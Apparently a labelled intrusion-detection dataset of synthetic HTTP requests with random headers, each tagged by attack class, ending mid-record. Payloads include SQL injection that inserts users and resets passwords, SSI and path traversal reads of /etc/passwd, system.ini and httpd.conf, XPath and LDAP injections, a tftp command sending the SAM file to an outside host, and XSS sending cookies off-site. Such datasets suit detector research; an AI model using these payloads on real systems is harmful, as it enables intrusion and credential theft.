PUT /ni287najkl0nte/msyHuHcX.tiff? HTTP/1.0
Content-Length: 68
Content-Language: w
Content-Encoding: identity
Content-Location: http://www.9iq5.it/bhis9gsa/eancneEo/eciiw3c.pl
Content-MD5: eGxpcmxubG1jYnN1ZTBzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Sep 09 16:47:20 UTC
Last-Modified: Fri, 18 Sep 09 22:14:03 UTC
Host: www.ernlarwlib.gov
Connection: lm7re4ho
Accept: image/jpeg;q=0.6, image/gif;q=0.0, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: jde-t2gn;q=0.9, dti7ds-n, rg-Gfaei, ttiTravy-aKeo89iq;q=0.0, ri-e4do;q=0.7
Cache-Control: max-stale=1
Client-ip: 221.158.6.21
Cookie: smabmitsCni=oIo0fZkmVQL;ZKkROO1openpR=4fs7nyieA;EuNipdGhCybei=dsno1deleteo;meearUthydiiH=uh3e8aDneoei7r;eeiaAwngcarnnfh=ld7S;drtouuzelHae=aemirrlet
Cookie2: $Version="965"
Date: Tue, 22 Nov 05 06:45:04 CET
ETag: W/"GbgsfTwbeR.kqAvDGd7"
Expect: maEbbf
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Sat, 08 Mar 08 14:51:08 CET
If-Unmodified-Since: Sat, 11 Sep 04 13:17:50 CET
If-Match: *
If-None-Match: "N6PBuHrMQ2MWbRg4h"
If-Range: *
Max-Forwards: 02
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 78-403185
Referer: /thYt/itaf/ao2dwee/orfawh/cfhewOee.html
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/8.5 (X11; U; Open BSD i386 3.1; rf-ia; rv:4.8.8) Gecko/10743947
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/1.8 www.d5tse.gif, FTP/4.2 www.umdstie.png:493, amtl/0.0 94.148.9.155:603
Transfer-Encoding: ibssb
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 131.117.242.175
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

osHspeMysa=aas2x&nooomTTnh3sea3L=he&eiefoiinr= OR    2     >     1

End - Id: 41494
Start - Id: 42277
class: SqlInjection
GET /xX2IR/oZmMVCF_mNSQRRcTFxv/exIAabWGrcArpHLsxd6X/fU7VwjgyE/fETEBkC5UJr3KSiPR/r325i/ehi/a7tniw/.sXQHBA2Bwinnt/ri0721rhWQutYJC/eAnesd1s3vih.php?lnhtvaapguXat=4934&sljhstcma=22&hsepIe=5i8edr0b&0FPn.rcpPgEfN2=13811490&roieanhtubinhE=%3B+EXEC%28++++%27INS%27%2B%27ERT+++INTO+users+++values%280%2C%27aosqodnjb%27%2C%27nvghie%27++%29%29&vrafcre=ny9pEJ&iesieaei83=ahpxfqu9fGTw HTTP/1.1
Host: 90.235.79.50:1
Connection: close
Accept: image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 208.207.204.31
Cookie: ivofOLdlc=r>hiezppi:netcatohrh;in2ZhfB1=reCziuouhulOeun:;d2ejit7nbllsit=819024;ptdtamnsndrtew=32e;eboiikti=oht;exAuNtnt=812087510
Cookie2: $Version="520"
Date: Sat, 07 Aug 04 21:53:42 CET
ETag: "rhy9oCBT7nmj@i1"
Expect: nm9eac=yolte9
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 20 Mar 06 09:22:27 CET
If-Unmodified-Since: Sun, 12 Aug 07 07:55:00 CET
If-Match: "TCjUqLG2W-yNXEXIO0B"
If-None-Match: *
If-Range: *
Max-Forwards: 93
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: NTLM YkN0dGFpb3ViSHFlaG9odmhsam5wcm83d2VoaXRubDN0c3FvZjVxcg==
Range: 17-374188
Referer: /nnes2ne/mrLcdtc/Neoa/tgomtm/0het.mpeg
TE: gzip;q=0.1,trailers,chunked;q=0.0
Trailer: Date
User-Agent: Mozilla/6.3 (Windows; U; Win98 6.9; re-C8; rv:1.2.1) Gecko/23350944
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0775x379
Via: 2.8 www.emyonca.tiff, HTTP/9.0 254.232.63.50, HTTP/2.0 51.215.62.167
Transfer-Encoding: 3flnn; hs5rnegd=i5sia
Upgrade: egf/1.1, bses/7.3
Warning: 903 www.csrnc.htm "rrsgh4khsra2oarcq2na" 
X-Forwarded-For: 204.220.169.227
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42277
Start - Id: 37313
class: LdapInjection
GET /@whereS-all7system/s2BhVAylA2CGgXC/WWH-S.JPNprocessing-instructionlogTK/gtip/autoexecQAEHPvumZOy9X./vboeidenB5i1uvE/ntrtoletss/cV_TMuN8G9/ciqnto2racgu0Mm2/ry9grvuEq9yHM.q_5e/dG_0BHYwwm/eoqgbtxqeSson.png?esek85sP=7015637015&cardAmeseu8dher=2sc%2Bcidle2ee&dl0nt1udbi=ut2tnurA3hstoelrla&i3a5Nin=l HTTP/1.1
Host: 137.250.13.196
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: mns6y-irheeb2;q=0.3
Cache-Control: no-cache
Client-ip: 181.208.243.92
Cookie: e8iddu=488;eeeitatJReaoioS=806
Cookie2: $Version="1"
Date: Thu, 28 May 09 20:33:59 CET
ETag: "5yOVEkJ43KhdQ4Hje"
Expect: eltioihl=t1tinEet
From: 9cuzRhxt@s7mEc.net
If-Modified-Since: Fri, 20 Feb 04 08:16:42 GMT
If-Unmodified-Since: Fri, 20 Jun 08 06:27:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Nov 08 19:46:56 CET
Max-Forwards: 0
MIME-Version: 4.4
Pragma: hnno13=t
Proxy-Authorization: 6uvrzn NtW2a=RSrpst
Authorization: NTLM ZXRvdWVsbG90aXZjd2VpZXVybGF2bmFmdDllcGNvMkF0dWpzbXVPOGd0
Range: 17-
Referer: /snh0Ei/m3ns/athhf.pdf
TE: chunked;q=0.4,trailers,gzip
Trailer: If-Range
User-Agent: ")(targetfilter=(o=NetscapeRoot))
UA-CPU: PowerPC
UA-Disp: 050,5091,32
UA-Color: color16
Via: 5.0 www.6ijkio.tiff, 2.9 232.116.64.47
Transfer-Encoding: compress
Upgrade: me0rtS/2.5, meFrup/7.5
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 97.235.140.149
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 37313
Start - Id: 45934
class: PathTransversal
GET /e-5_sIO.OL2N/moianSewrAo7l5/shCty3/fmyyVBRKFzbS-mXbYS/tyknOb/eNX4/uiAEt0dn1wiSotnpp/vi2pTNo6tlaiiupo/8OsO17oIcaftci4hemsr/u-lhOb0yTgREwqoTioPB.msf?upassthruis9EdocumentDBcqp=%5CWINNT%5Csystem.ini HTTP/1.1
Host: 89.95.202.152
Connection: close
Accept: video/*;q=0.1, image/png, application/zip
Accept-Charset: *
Accept-Encoding: identity, gzip
Accept-Language: *
Cache-Control: min-fresh=16607
Client-ip: 97.149.89.41
Cookie2: $Version="239"
Date: Wed, 06 Sep 06 21:45:08 UTC
ETag: W/"u55RZ65BYdnj8rC0"
Expect: exbam=LrtehsF
From: oeeo@awOyreEpb3.st
If-Modified-Since: Tue, 17 Nov 09 06:32:44 CET
If-Unmodified-Since: Thu, 01 Apr 04 04:52:07 UTC
If-None-Match: "pCV7_RHQnEZ3Wfi"
Max-Forwards: 7656
Pragma: yne='mGoorr'
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic bnJleGk6OWhlcHQ=
Referer: http://lyshqwe.fr/nanund/tivl/seeod.php
User-Agent: Mozilla/8.1 (Windows; U; Win98 1.4; sa-jc; rv:3.6.4) Gecko/75346561
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: HTTP/9.1 149.126.181.36, 5.2 www.a0mywey.jpg:6, 3.7 www.gunaomL.html
Transfer-Encoding: telre
Warning: 301 www.foehiLHu.gif "dqnsc" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45934
Start - Id: 48455
class: XPathInjection
GET /dFiEkRKP_o4l@GYub/nzcy@.U.gif?vbscriptO76VeAwindow.open=oh+oear0fa&Eli=ehsXWltYr2J&oums7zs=9257&mYBlike=0&t4n=e-_7jF HTTP/1.1
Host: 35.90.119.105:80
Connection: exfte
Accept: image/png;q=0.2, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aA-ee;q=0.3
Cache-Control: lpTg='cl3lf'
Client-ip: 62.130.69.26
Cookie: huH7j3nHoibr=h0'     or    count(   path/child::node()[position(    )=((    i  +   j  +   k    +  l +  1)]    |  path/child::*()[position()=(k+1)])=1   or   'iii'=    ' Ytob'  or;K_kK=I
Cookie2: $Version="834"
Date: Tue, 15 Jul 08 05:17:20 CET
ETag: W/"qUIhv.IEIHnJf8U"
From: nuehal@ifkmfi.it
If-Modified-Since: Tue, 27 Apr 04 04:46:33 UTC
If-Unmodified-Since: Tue, 06 Jul 04 09:21:55 CET
If-Match: *
If-None-Match: "mnXiwwubbhc48N3sYT6V"
If-Range: "42Rag7Iu9LOValFJ"
Max-Forwards: 9
MIME-Version: 9.2
Pragma: o4=m0
Proxy-Authorization: NTLM ZUFsc2FiY2FtRWVyZTF0VXZ0aG9obm80b3BsYjYxbGh0cmVsMzdhelR3b250ZWxo
Authorization: NTLM bnRseHUxZVRwZWEyaGl6aVNhc2locGV0aHJzd2x3b2VJ
Range: -12,39361-
Referer: /bwnR8Eo/2sas/pisNS5mm/sgtmonie/alencA.pl
TE: chunked;q=0.6,trailers,trailers
User-Agent: Mozilla/4.9 (Windows; U; Win98 5.2; gt-dl; rv:2.4.7) Gecko/55183088
UA-CPU: Sparc
UA-Disp: 3766,742,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 191x184
Via: 2.8 147.30.50.39
Transfer-Encoding: identity
Upgrade: hme/9.1, trs/3.3
X-Forwarded-For: 111.85.227.251
X-Serial-Number: 881741666326313
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 48455
Start - Id: 42166
class: SqlInjection
GET /.DGcaoptXEVc/u5_CGpmKvmes0cC8givW/aNKMd/s7Rj/hsglBxPoQ1HC7/R7RZmocha0ZcFv9xtermE7@/pen2eafdpagrlea/farda9l7O/servicesAfYxdhKLk-y/sCCtEDiAKNjZV/iaN4/50.exe?dxure=fXSqMF87-&NKnDOAxCwgethZ=Nwedt&yvJsq=amo&nzYsnzadVozou97=1221&p2pceelqia=x%26t0reshutdowno&oai3eao42xm5u=n%3BmThhtpasseMa1zadmin%5D&rihlo0ee87esT=Tcaettehl&2xaKsgiablas3mi=rwuz9e&nnte2=aF.5hC68Q&ch=0qllyErakt&chhfnbs4tnp2ym=103397&habbdiqaydonrri=l3oqNa&UwBbbtl-syR=%3Balter++++table+++++naas+set+++password+++++%3D++%277sv0rv%27++where+++name+++%3D+%27it%27%3B HTTP/1.1
Host: www.ecEre.uk:80
Connection: lndnn
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: dos9-o;q=0.6, 0O-3f;q=0.2
Cache-Control: max-stale
Client-ip: 45.250.133.235
Cookie: tg0za=5229;feheel1cb=tf1nGRFQ;hoaGo= ql |oad'niblhi7bgsoundt
Cookie2: $Version="82"
Date: Fri, 06 Nov 09 03:12:12 UTC
ETag: "rmoKgaJRhzxXhz04d"
Expect: 100-continue
From: tktabU@4ahlq0ig.org
If-Modified-Since: Tue, 16 Jun 09 16:27:33 CET
If-Unmodified-Since: Sat, 21 Apr 07 06:24:09 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Aug 09 16:33:58 GMT
Max-Forwards: 49
MIME-Version: 5.9
Pragma: neta6='ne'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic aWVuejQ6NmluSWls
Range: -65233,-6365
Referer: http://0TefEwta.biz/A7n5T97n/anaRe/nAhy/tlAl4ee.tar
TE: chunked,trailers
Trailer: From
User-Agent: et4tzFhas
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: 1.4 9.224.121.24
Transfer-Encoding: rnsgfm; 4o7ut=xhry
Upgrade: tNMgnj/4.8, 6nig/6.9, f01otg/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42166
Start - Id: 39734
class: SSI
GET /kRcdt3r/oW/mqzCL/6EarayqrafjqtayfLh8.png?binlikezv_fmmetajHz=tadmin%5Ch&tyWoefmtla=toQps&3eeemtem3Ts0i=%3C%21--++++%23include++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&Q3QLbin12vr=6&st=8301&tR7qimgeD=4569RsD0q.&up=r HTTP/1.1
Host: www.mccljeci.org
Connection: Rngls
Accept: */*;q=0.4
Accept-Charset: windows-1257;q=0.2, windows-1255
Accept-Encoding: 
Accept-Language: r-trad;q=0.7, t-nt3rm, tom72cA-rdeZenp0
Cache-Control: min-fresh=2
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="1"
Date: Mon, 05 Sep 05 23:18:31 CET
ETag: "RpokNe@hiUrDxRmesWrO"
Expect: 100-continue
From: edtEiwvr@nastnEtx.it
If-Modified-Since: Thu, 09 Feb 06 12:23:12 UTC
If-Unmodified-Since: Fri, 23 May 08 16:48:19 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Feb 10 02:40:16 UTC
Max-Forwards: 200
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: 5O8lgd dEae=hb6eE
Authorization: Basic dGRpc2lpOm50YkJpdDU=
Range: -58,-7,-12255
Referer: /pnen/eyhnRp/h7rl/oemAshRE/uvr9becE.php3
TE: trailers,chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/7.9 (Windows; U; Win98 7.9; tg-ei; rv:4.3.2) Gecko/52006587
UA-CPU: Sparc
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 602x675
Via: dde/4.8 232.147.127.189, 6.1 www.ety1.png
Transfer-Encoding: identity
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39734
Start - Id: 36306
class: PathTransversal
GET /trBZIltpg.y7fjEI/qyhgeiaiDfsUaMrhisbq.mspx?tarhHdepdeeres=ipidksytRRpm&Yaaeteidunr=y&Fqi9pL=havingee%3B5openeeMod%3F&1a-DF5=%2Fetc%2Fhttpd%2Fhttpd.conf&Iil6H9lam=o&WjTE.fZ=mAwmymD&arein=pn&q4smteiteea=and%3BmA%5Dmiij%3Fod+&0A5=sxd3gKUu&oesai=%5Ciw&hRDewhaol8wrdie=4&crcnF=7%3Fi%5B&vJwp-LDORnwhH=pr HTTP/1.1
Host: www.9citlep5nE.fr
Connection: close
Accept: image/*, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rhn-tyslvxto;q=0.2, ospe9ojf-Ngdla1v;q=0.7
Cache-Control: o='snW0a'
Client-ip: 145.8.91.154
Cookie: n8oiol4ua=3de-q2tTMq2;soyns0=nteOftpsdbrzti)it
Cookie2: $Version="469"
Date: Sat, 29 Jan 05 06:40:30 UTC
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: 5ygo@eiccrasaq.org
If-Modified-Since: Wed, 06 Oct 04 03:00:39 UTC
If-Unmodified-Since: Sun, 13 Mar 05 12:37:32 GMT
If-Match: "QysLfqwJ1kveU1y3"
If-None-Match: *
If-Range: Sun, 05 Mar 06 06:40:29 CET
Max-Forwards: 3905
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: Basic bXMxZXJobzpzYXVyaWg=
Range: -24492,6727-90720
Referer: /noerbo/tleepl3/tfoe/vgdpta.tiff
TE: deflate;q=0.8,deflate,gzip
Trailer: Accept-Encoding
User-Agent: y@16MwOsO http://www.se8saF.be
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 1.6 www.erott.gif
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36306
Start - Id: 39298
class: SSI
GET /home@window.openWzyM/ssabnrehph/n2MS/DEZIOreplacedncV/iKK.htm?aarxi=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&gdhi14lortauto=wbebepotI5ter4eL HTTP/1.0
Host: 175.199.251.140
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: gb2312;q=0.1, ks_c_5601-1987;q=0.8, x-mac-chinesesimp, x-mac-icelandic, iso-2022-jp;q=0.6
Accept-Encoding: compress, compress;q=0.6
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 178.60.27.113
Cookie: e5htnbH1erD5=3390562100;io=9;chniwebXrn8=7;gndAfine=74
Cookie2: $Version="390"
Date: Tue, 26 Jun 07 02:35:13 GMT
ETag: W/"jsr.W0L@rVg50t8d"
Expect: iGetlsru
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Sun, 29 Mar 09 17:57:44 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Dec 04 20:00:28 CET
Max-Forwards: 6
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: NTLM NWN0R2Qwb3RyaGZ3ZGVvVGNkZmpucXlhaXRhQU1uZWZs
Range: -9614
Referer: http://www.ILiqs.uk/egdTe/sope.png
TE: trailers,deflate;q=0.6
Trailer: Expect
User-Agent: 8ljDq (eTnbxTsi; oBO20uwd; iBd.-F; lXVnFWw; eEMNPOE)
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 573x190
Via: 6.1 209.225.112.43, 6.8 www.ytmo.tiff
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: eoT/0.4, thh/1.7, lEi/5.2, hTntjr/7.1, as1ri/9.2
Warning: 156 www.oflmf0.htm "ohhwOseoMrpccZBlSp" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 80952053828136219
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39298
Start - Id: 35152
class: SqlInjection
POST /tgwT23nh7ANJ/tluiasrknNbhtnler/re4itoh9gaerNshnto/a9/ahnidtgbh.png? HTTP/1.0
Content-Length: 200
Content-Language: 6teon
Content-Encoding: gzip
Content-Location: /t74sr/antern.jpeg
Content-MD5: YXJtTmliZ3A5dGVudHJubA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 04 24:22:54 GMT
Last-Modified: Sat, 30 Jan 10 12:29:41 UTC
Host: www.oIenieeee.st
Connection: seoenf
Accept: application/postscript, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 239.245.76.171
Cookie: xmriwS16ximac=ik4XwtKv;mrNGYnMo@a=oShome8hff>tx
Cookie2: $Version="7"
Date: Sun, 23 Sep 07 12:29:46 CET
ETag: W/"GLS9viRxwtjaVSxkna"
Expect: eel5Noee
From: obasole@fadfesnt.cz
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Wed, 09 Apr 08 19:10:53 GMT
If-Match: *
If-None-Match: *
If-Range: "8C0Af7r6zKkvRJKdo"
Max-Forwards: 97
MIME-Version: 8.9
Pragma: xhii=eiruea
Proxy-Authorization: Digest username="e7tedn"
Authorization: Basic ZDJlbjp0bGFsZjRu
Range: -960786
Referer: /rettcPs/nitsaR2.swf
TE: deflate
Trailer: Host
User-Agent: ert4olnlA/8.4
UA-CPU: StrongARM
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 5.9 167.19.118.201, kv3/4.6 www.mknwTet.jpeg:938, 8.0 200.12.83.154
Transfer-Encoding: compress
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 795 202.58.110.230 "nyEakndeio" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 579595075261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aer1pfiiEsihq0o='    )    UNION   ALL SELECT  5509 FROM     vehsr     WHERE ('' =  '&xvurmo=32284754&Iaer27sinandw=kqr&gncje=2b1aTt&mcybcsevs=w7MLWQJNx&oherNntes3W=he~&dtsraojAedoa=oin

End - Id: 35152
Start - Id: 44583
class: OsCommanding
GET /bacynetcatI5/mUallZewgetfnetcatSV9/e23FN5xAUDPK/h1awdayomth.msf?wlkfBtGE=zV6.ktl&tevns409poj4t6f=tdag&7Tp_G2n5jD=uoq3no5mochac&elmgeqnt=mDLAod.&onhfizoukme=213.245.119.30%7C+++++tftp+-i+++216.217.23.80+PUT+sam._&shH1=ny.5XopqpgJ&ddrlnejp=415584407&e7ot7em1Oheywe=+h&mkteNsuon26gohd=e&PRrzn=w HTTP/1.1
Host: www.plxf9tpu.it
Connection: cmab
Accept: */*
Accept-Charset: x-mac-greek, shift_jis;q=0.1, x-mac-cyrillic
Accept-Encoding: deflate;q=0.6, identity, deflate
Accept-Language: *;q=0.7
Cache-Control: min-fresh=44844
Client-ip: 2.90.133.61
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Wed, 24 Dec 08 23:43:13 GMT
ETag: W/"wGdDKS5AiuXyrtwMN2s"
Expect: l5ocdtw=ot2rhq
From: 5adpe@rmshynj.net
If-Modified-Since: Sun, 16 Nov 08 19:17:53 UTC
If-Unmodified-Since: Wed, 23 Apr 08 17:01:04 UTC
If-Match: "QytJcDmlsTYW0IRtI"
If-None-Match: "nRmw-XK277S1QYYnS5b"
If-Range: Sat, 01 Dec 07 09:03:56 CET
Max-Forwards: 9736
MIME-Version: 0.9
Pragma: tcTa='pvqn5p'
Proxy-Authorization: Basic YXNkdUdTOnVzZTcz
Authorization: NTLM a2J1cmgzMWhpZW9ubm55aGlCZ2xuZWluanJzQm9zZW5SYXNpYWlwNWVMczBu
Range: 746-,-10102
Referer: http://www.icex.de/tp6se/hbtcwome.jsp
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: pbioaob (txNygggs)
UA-Color: color32
Via: HTTP/7.1 www.anelAe.jpeg, hguugm/0.1 www.twetRteu.png, HTTP/0.2 www.eryh.htm
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
Warning: 011 65.177.109.164 "rqtrCd" "Sun, 13 Nov 05 17:42:15 UTC"
X-Forwarded-For: 84.212.52.145
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44583
Start - Id: 48120
class: XSS
GET /oeiuooteueEn0eibIT/vRDA6/m9aFa5iuglNieagadt/h6bi2/kn/0eiriy6Intee/jqYJ7U@LUUEZZxXIT.dll?yau2=hnetcatt&Q9cmdk0EVfi=dhhTrstrshaxefdisa&6rqgndasoi=c86qw01%40O&dg1rstmsrh=qNr&FDprVPO=oZTx-eP1xF&3armceehhi=nKIfxigL5f.&3Af1I=%29rin%5DQnf0tilhhT&i0fsjn=Llpw&losEflt9uT=326&etQtuhUa=%26%3Cscript+++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.siri.com%2Fcgi-bin%2Ftiniseiech.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E&C4i_Peh=68370471&3oewh=7cmsrdtrcteahwbicr&ahensee8t=nulld&aaf74o=Ti HTTP/1.1
Host: www.nrectqn.ch
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-8, iso-8859-7;q=0.0, iso-8859-15;q=0.2, iso-8859-8-i, x-mac-cyrillic
Accept-Encoding: *;q=0.3
Accept-Language: mAetct-1;q=0.4
Cache-Control: no-store
Client-ip: 193.109.62.83
Cookie: 4aue2n7Oix=5oaq;selmbohtseeed=yHrpRIVLIAW
Cookie2: $Version="832"
Date: Wed, 13 Dec 06 01:41:53 CET
ETag: W/"5f_rOYoCLLiXItY"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Mon, 15 Mar 04 09:33:52 GMT
If-Unmodified-Since: Fri, 06 Aug 04 10:28:56 GMT
If-Match: "WlgHts13DlvSAD08T"
If-None-Match: "sqcRfnR0cB2zpVyYtUy"
If-Range: *
Max-Forwards: 302
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: /i77uw.swf
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/2.8 (Windows; U; WinNT 4.2; e4-tu; rv:1.3.7) Gecko/16639148
UA-CPU: 68000
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: 1.0 145.243.65.117, HTTP/0.3 109.41.215.3, 1.0 61.82.74.170:8557
Transfer-Encoding: identity
Upgrade: paleei/6.9, pyefh/6.3, aeu/0.2
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48120
Start - Id: 35377
class: SqlInjection
GET /TBj/knehiehypsLy/system1L/2O4AxdGTq/phAaljgria8rperr7k/pRyD9V0Si_Eb-znVJz.js?acuhxeozrip0er5=ihDyw&E3iri=%3B+++++EXEC%28+++%27INS%27%2B%27ERT+INTO++++users++++values%2820%2C%270qeyohas%27%2C%27ws48%27%29%29 HTTP/1.0
Host: 109.20.14.47
Connection: close
Accept: audio/*;q=0.2, image/*
Accept-Charset: windows-1253, gb2312, iso-8859-15, x-mac-icelandic
Accept-Encoding: 
Accept-Language: eweutee-1u;q=0.1, isvwew-o, on-yi;q=0.4
Cache-Control: aef='dtAu'
Client-ip: 246.233.58.195
Cookie: 0p=tGh3etetuoh
Cookie2: $Version="49"
Date: Fri, 26 Sep 08 02:19:41 CET
ETag: "2VtXGzIMP09lZu9Q"
Expect: eeosm=3uereXt
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Wed, 24 Feb 10 24:50:18 GMT
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "VK6tZFF1ZfIx56bA3e7W"
If-None-Match: "kE-gY7BT_4PhVaWaP8F2"
If-Range: Sun, 14 Jan 07 04:02:04 GMT
Max-Forwards: 6985
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: Basic Z3NydnU6a2VseW0=
Authorization: NTLM bm9VMzFwc0ltcWVhVWVIaG0wZ3N0QXN0ZWFudHU5ZTR0ZWJDb2dyU09pa3RyM2M=
Range: 187-
Referer: http://mlov8tx.de/pwbwe.mp3
TE: deflate;q=0.9,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.4 (X11; U; Solaris 9.8; s4-hA; rv:2.7.8) Gecko/60489582
UA-OS: Windows 95
UA-Pixels: 1597x768
Via: 3.7 33.213.144.25, FTP/0.0 235.54.172.154:9246
Transfer-Encoding: identity
Warning: 961 www.Nezio.shtml "yirNnnptNp5er5wpa6a" "Sun, 10 Jul 05 04:38:42 GMT"
X-Serial-Number: 4224204056038719
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35377
Start - Id: 38066
class: LdapInjection
GET /vPXtCvBDcp3hQOpP/%um8iUfmmqN/NYI9FTAUUF/OpSthmomnswbYhhwscdi/wcnlyeeciS7tl/xFSSaXMnow685/wfeiagtNzuoeaiSi/iiolhr4ylIlm/lE.php?14nftp=nf&bEr=%29%28+%7C+%28ear8e%3DrnG*%29&olhen=4699 HTTP/1.0
Host: 136.78.99.184
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
